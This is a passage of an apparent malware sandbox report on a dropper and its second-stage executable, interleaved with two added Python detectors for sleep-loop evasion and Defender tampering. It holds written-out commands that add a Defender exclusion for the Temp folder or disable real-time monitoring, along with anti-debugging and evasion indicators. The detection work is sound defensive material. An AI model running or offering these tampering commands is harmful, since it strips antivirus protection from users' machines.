              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (4 identical entries)
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exe | Window / User API: threadDelayed 5642
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6806
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2964
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3597
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 995
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7372
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2395
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Window / User API: threadDelayed 9197
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Window / User API: foregroundWindowGot 1759
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | API coverage: 5.1 %
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exe TID: 6540 | Thread sleep count: 5642 > 30
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exe TID: 6540 | Thread sleep time: -141050s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6756 | Thread sleep count: 6806 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6756 | Thread sleep count: 2964 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1732 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3228 | Thread sleep count: 3597 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960 | Thread sleep count: 995 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6524 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5972 | Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6348 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3920 | Thread sleep count: 7372 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3920 | Thread sleep count: 2395 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2940 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe TID: 6108 | Thread sleep time: -91970s >= -30000s
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exe | Last function: Thread delayed (2 identical entries)
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Last function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Thread sleep count: Count: 9197 delay: -10
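The sleep entries above are the sandbox's evasion heuristics firing: a thread that calls the delay primitive more than 30 times, or sleeps 30000 ms or more in total, is flagged. The block below is an added example, not the sandbox's code, that replays a constructed NtDelayExecution trace through those two thresholds and separates a loop of many short sleeps from one long sleep and from a wait with no real timeout. The AHPOBS.exe thread reproduces the report's own figures (9197 calls at delay 10 give the 91970 it prints); the 25 ms per-call value for Gq48hjKhZf.exe is an assumption chosen so that 5642 calls reach the reported 141050, and the remaining threads are invented for contrast.

```python
"""Sleep-loop evasion heuristics of the kind the sandbox applies above.

Added example, not the sandbox's own code. It replays a constructed trace of
NtDelayExecution calls through two rules whose thresholds are visible in the
report ("Thread sleep count: N > 30", "Thread sleep time: T >= 30000 ms").
"""
from dataclasses import dataclass

# Thresholds taken from the comparisons the report prints.
MAX_SLEEP_CALLS = 30          # per thread
MAX_TOTAL_SLEEP_MS = 30_000   # per thread
# Above a day we treat the call as a blocking wait rather than a timed delay.
# The report's 922337203685477 is Int64.MaxValue // 10000, i.e. an infinite
# timeout in 100 ns ticks expressed in milliseconds.
INDEFINITE_MS = 24 * 60 * 60 * 1000


def nt_interval_to_ms(interval: int) -> int:
    """Convert an NtDelayExecution interval to milliseconds.

    The kernel takes 100 ns units; a negative value means 'relative to now',
    a positive one an absolute deadline. The sandbox keeps the sign of
    relative intervals, which is why the sleep times above read '-141050s'.
    """
    if interval > 0:
        raise ValueError("positive interval is an absolute deadline, not a delay")
    return -interval // 10_000


@dataclass
class ThreadSleep:
    process: str
    tid: int
    count: int = 0
    total_ms: int = 0
    max_ms: int = 0

    def add(self, ms: int) -> None:
        self.count += 1
        self.total_ms += ms
        self.max_ms = max(self.max_ms, ms)

    def verdict(self) -> str:
        if self.max_ms >= INDEFINITE_MS:
            return "indefinite wait"
        if self.count > MAX_SLEEP_CALLS and self.total_ms >= MAX_TOTAL_SLEEP_MS:
            return "sleep loop"
        if self.count > MAX_SLEEP_CALLS:
            return "many short sleeps"
        if self.total_ms >= MAX_TOTAL_SLEEP_MS:
            return "long sleep"
        return "benign"


def aggregate(events):
    """events: iterable of (process, tid, delay_ms) -> {(process, tid): ThreadSleep}."""
    threads = {}
    for process, tid, ms in events:
        key = (process, tid)
        if key not in threads:
            threads[key] = ThreadSleep(process, tid)
        threads[key].add(ms)
    return threads


def verdicts(events):
    """Map (process, tid) to its verdict string."""
    return {key: t.verdict() for key, t in aggregate(events).items()}


def build_sample():
    """Constructed trace. AHPOBS.exe TID 6108 reproduces the report's figures
    (9197 calls of 10 ms = 91970 ms). Gq48hjKhZf.exe TID 6540 assumes 25 ms
    per call so that 5642 calls give the reported 141050 ms; the per-call
    value is not in the report. The other three threads are invented."""
    events = [("AHPOBS.exe", 6108, nt_interval_to_ms(-100_000))] * 9197  # -10 ms relative
    events += [("Gq48hjKhZf.exe", 6540, 25)] * 5642
    events += [("powershell.exe", 1732, 922_337_203_685_477)]
    events += [("loader.exe", 100, 60_000)]
    events += [("notepad.exe", 200, 500)] * 3
    return events


if __name__ == "__main__":
    for (process, tid), t in sorted(aggregate(build_sample()).items()):
        print(f"{process} TID {tid}: {t.count} calls, {t.total_ms} ms total -> {t.verdict()}")
```

Keying on count and total per thread rather than per process is what lets a loop of tiny delays (10 ms here) surface next to a single long sleep; a detector that only looks for large individual intervals sees nothing in the AHPOBS.exe trace.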
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,10_2_004339B6
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00452492
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00442886
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_004788BD
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,10_2_0045CAFA
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00431A86
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,10_2_0044BD27
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_0045DE8F FindFirstFileW,FindClose,10_2_0045DE8F
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_0044BF8B
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,10_2_0040E500
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (4 identical entries)
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exe | File opened: C:\Users\user\AppData\Local\
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exe | File opened: C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.tmp
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exe | File opened: C:\Users\user\AppData\
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exe | File opened: C:\Users\user\
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exe | File opened: C:\Users\user\AppData\Local\Temp\AC2F.tmp
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exe | File opened: C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp
              Source: AHPOBS.exe, 0000000A.00000002.3916841714.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | API call chain: ExitProcess graph end node
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_0045A370 BlockInput,10_2_0045A370
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,10_2_0040D590
              Source: C:\Users\user\Desktop\Gq48hjKhZf.exe | Code function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_000000014000D9C4
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,10_2_004238DA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (3 identical entries)
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_0041F250 SetUnhandledExceptionFilter,10_2_0041F250
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0041A208
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00417DAA

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara match | File source: amsi64_6340.amsi.csv, type: OTHER
              Source: Yara match | File source: Process Memory Space: Gq48hjKhZf.exe PID: 6396, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\AC2F.tmp\AC30.tmp\AC31.bat, type: DROPPED
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp" (2 identical entries)
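The process-creation line above is the whole evasion: the dropped batch file asks Defender to stop scanning the very folder the second-stage AHPOBS.exe is dropped into. Two details matter for detection. powershell.exe accepts `/` as well as `-` before a parameter and any unambiguous prefix of the name, so `/nop /com` is `-NoProfile -Command`, and a rule that matches the literal `-Command` misses it. The same cmdlet is just as often delivered through `-EncodedCommand` (base64 of UTF-16LE), which the head of this report also flags. The block below is an added example, not part of the sandbox report, that runs over a constructed list of command lines (the first is the report's own line; the encoded, `Set-MpPreference` and benign variants are made up for contrast) and flags Defender tampering, decoding the encoded form and marking exclusions that land in user-writable directories.

```python
"""Flag PowerShell command lines that weaken Microsoft Defender.

Added example; it is not part of the sandbox report. The detection runs over
a constructed list of process-creation command lines, the first of which is
the line the report records above.
"""
import base64
import re
from typing import Optional

# powershell.exe accepts '-' or '/' before a parameter and any unambiguous
# prefix of the parameter name; '-e' and '-ec' are documented short forms
# of -EncodedCommand. A rule keyed on the literal '-Command' misses '/com'.
_SWITCH = re.compile(r"^[-/]([A-Za-z]+)$")

# Tampering primitives: exclusions added with Add-MpPreference, or a
# protection feature switched off with Set-MpPreference -Disable*.
_MP_CMDLET = re.compile(r"\b(?:Add|Set)-MpPreference\b", re.IGNORECASE)
_EXCLUSION = re.compile(
    r"-(Exclusion(?:Path|Process|Extension|IpAddress))\s+"
    r"(\"[^\"]*\"|'[^']*'|[^\s;|&]+)",
    re.IGNORECASE,
)
_DISABLE = re.compile(r"-(Disable[A-Za-z]+)", re.IGNORECASE)

# Directories an unprivileged user can write to. Excluding one of them lets
# the malware stage payloads (here AHPOBS.exe in Temp) that are never scanned.
_USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|Users\\Public|ProgramData)\\", re.IGNORECASE)


def _is_encoded_switch(token: str) -> bool:
    """True for -EncodedCommand and its accepted abbreviations (-e, -ec, -enc, ...)."""
    m = _SWITCH.match(token)
    if not m:
        return False
    name = m.group(1).lower()
    return name in ("e", "ec") or (name.startswith("en") and "encodedcommand".startswith(name))


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or None
    when the line carries none or the payload does not decode."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if _is_encoded_switch(tok):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def analyze(cmdline: str) -> dict:
    """Classify one command line; 'tampering' is the overall verdict."""
    decoded = decode_encoded_command(cmdline)
    script = decoded if decoded is not None else cmdline
    finding = {"tampering": False, "encoded": decoded is not None, "cmdlet": None,
               "exclusions": [], "user_writable": False, "disables": []}
    cmdlet = _MP_CMDLET.search(script)
    if not cmdlet:
        return finding
    finding["cmdlet"] = cmdlet.group(0)
    for _kind, value in _EXCLUSION.findall(script):
        # Values may be quoted and comma-separated; nested quoting inside a
        # -Command string is deliberately not handled here.
        for path in value.strip("\"'").split(","):
            path = path.strip().strip("\"'")
            finding["exclusions"].append(path)
            if _USER_WRITABLE.search(path + "\\"):
                finding["user_writable"] = True
    finding["disables"] = _DISABLE.findall(script)
    finding["tampering"] = bool(finding["exclusions"] or finding["disables"])
    return finding


def encode_command(script: str) -> str:
    """Produce the -EncodedCommand form PowerShell expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample: the report's own command line, an encoded variant of
# it, a Set-MpPreference variant, and a benign line touching the same folder.
SAMPLE_EVENTS = [
    r'powershell /nop /com "Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"',
    "powershell -nop -w hidden -enc "
    + encode_command(r"Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"),
    r'powershell -c "Set-MpPreference -DisableRealtimeMonitoring $true"',
    r'powershell -nop -c "Get-ChildItem C:\Users\user\AppData\Local\Temp"',
]


def scan(events):
    """Return (cmdline, finding) for every event judged to tamper with Defender."""
    hits = []
    for cmdline in events:
        finding = analyze(cmdline)
        if finding["tampering"]:
            hits.append((cmdline, finding))
    return hits


if __name__ == "__main__":
    for cmdline, f in scan(SAMPLE_EVENTS):
        form = "encoded" if f["encoded"] else "plain"
        print(f"[{form}] {f['cmdlet']} exclusions={f['exclusions']} "
              f"user_writable={f['user_writable']} disables={f['disables']}")
```

Feed it process-creation command lines (Sysmon event 1 or Security event 4688 with command-line auditing on) rather than script-block logs alone: the report shows the cmdlet arriving as a one-liner from cmd.exe, and an exclusion on Temp is worth an alert on its own even before the dropped executable runs.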
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_00436CD7 LogonUserW,10_2_00436CD7
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exe | Code function: 10_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,10_2_0040D590
              Source: AHPOBS.exe, 0000000A.00000002.3917181871.0000000003DD0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: winmgmts:\\localhost\root\securitycenter2ny
              Source: AHPOBS.exe, 0000000A.00000002.3917181871.0000000003DD0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\local\temp\ahpobs.exe:y
              Source: AHPOBS.exe, 0000000A.00000002.3917181871.0000000003DD0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\local\temp\sq8.dll/y<m
              Source: AHPOBS.exe, 0000000A.00000002.3917181871.0000000003DD0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\local\temp\bass.dll
              Source: AHPOBS.exe, 0000000A.00000002.3917181871.0000000003DD0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\local\temp\bacb.dll
              Source: AHPOBS.exe, 0000000A.00000002.3917181871.0000000003DD0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: hklm64\software\mozilla\mozilla firefox\
              Source: AHPOBS.exe, 0000000A.00000002.3917181871.0000000003DD0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\local\temp\baenc.dll
              Source: AHPOBS.exe, 0000000A.00000002.3917181871.0000000003DD0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\local\temp\lamx.exe
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ^:tto
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vvahkz'
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: osversion^:tt
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: lojjxqikja^:tt
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: lojjxqikjattitl_:tu
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l^:tt
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sqlite_oke_vers
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rt^:tt
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sqlite_error^:tt
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sqlite_abort]:tw
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sqlite_interrupt
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ws_ex_topmost\
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: yyrtrreeitety
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: em_scrollcaretr
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: fo_overwritetyo
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: dword latency;h
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tagpointlitee
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tcpevent_none>
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sqlite_misuse;
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tcpevent_data4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sqlite_mismatch1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sqlite_row*
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: g_hdb_sqlite'
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sqlite_corrupt
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: gdip_epgquality
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: gdip_eptlong
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _escapi_dll
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: gui_focusrgb
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sqlite_donee
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: __ghdbs_sqlite
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: gdip_pxf24rgb
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ws_popup
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: stdout_childe
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: g_hdll_sqliteh
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: em_scrollost
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sqlite_open_createte\:tv
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sqlite_open_readwrite\:tv
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sqlite_type_blobtf8\:tv
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sqlite_encoding_utf8\:tv
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sqlite_type_null
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ite\:tv
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: g_butf8errormsg_sqlite\:tv
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: g_sprintcallback_sqlite]:tw
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: __gbsafemodestate_sqliter:tx
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: uintm"
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: isoket
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: logxsda"
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: uint\"
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: eltoul
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uintp"memstr_f7319205-4
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: uint2pmemstr_68d39eef-8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lengthmemstr_79b413aa-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float;memstr_52ae5e29-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword flags;memstr_949d1bc0-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_sample_fx},memstr_9817f37f-b
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword chans;y;v,memstr_4008f61a-c
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword priority;s,memstr_66ccb955-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float maxdist;l,memstr_7f80cf36-a
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float mindist;i,memstr_ec36ca14-7
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword oangle;b,memstr_dcbab026-3
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword ctype;_,memstr_ef941035-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword iangle;x,memstr_dbef82ec-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float outvol;u,memstr_acfee04e-f
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword max;;n,memstr_024fdfba-0
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: float volume;k,memstr_742bf9b7-5
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword freq;d,memstr_20a24f04-2
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword freqa,memstr_b1fa228e-e
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword freqs;:,memstr_bf27e0ad-1
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword origres;7,memstr_9cbc0e7c-6
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bass_recordinfo0,memstr_cd0580f4-1
